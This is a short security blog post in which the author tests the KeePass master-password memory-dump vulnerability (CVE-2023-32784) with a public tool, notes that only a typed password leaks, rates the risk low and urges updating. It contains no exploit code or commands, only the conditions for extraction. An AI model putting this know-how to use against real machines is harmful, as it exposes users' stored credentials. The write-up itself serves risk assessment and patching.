Password managers can be an important tool in any organization’s security infrastructure. These tools allow users to manage individual credentials for each application they use. In addition, password managers can allow teams to easily manage logins for shared tools. However, password managers have been in the news recently for a number of security breaches.
LastPass, a popular cloud-based password manager, was the victim of a breach that exposed user password databases. Another popular password manager, KeePass, stores an encrypted password database either locally or on a network drive. It too, has been subject to a recently-discovered exploit (CVE-2023-32784) that allows an attacker to extract the database’s master password. It’s important to note that this exploit retrieves the password from memory, as opposed to attacking the database file directly. This requires either creating a process dump of the KeePass application while it is running, or a full memory dump of the host, after the KeePass database has been closed.
I tested this vulnerability by using the following publicly available exploit: KeePass 2.X Master Password Dumper. This tool analyzes a memory dump of the KeePass process to extract the password stored in running memory.
First, I wanted to see if it was possible to obtain the master password by simply opening the KeePass database:
As you can see, the exploit cannot retrieve the master password from simply obtaining the password database, and it provides only the output shown below:
Next, I attempted to use the exploit after pasting the master password and opening the password database:
Again, the exploit returned junk data:
Finally, attempting the exploit after manually typing the password in resulted in disclosure of the master password, except for the first two characters:
Successful exploitation of this vulnerability relies on two criteria:
1. The attacker compromises a machine that either has an open KeePass database or has recently closed the database.
2. The user typed in the master password, rather than pasting it.
While this vulnerability is rated as a high-severity vulnerability with a 7.5 CVSS score, my opinion is that the risk this vulnerability presents is low. This vulnerability depends on a very specific set of circumstances to exploit, and as a result would not be a primary attack vector for a compromise, although it could be used to further escalate privileges. In addition, it can be defended against by using compensating controls, or by updating to the most recent version of KeePass.
KeePass has released a new version – 2.54 – that resolved this vulnerability as seen in the video below. We recommend that anyone using KeePass update it to the newest version, which is 2.57 at the time of publication.
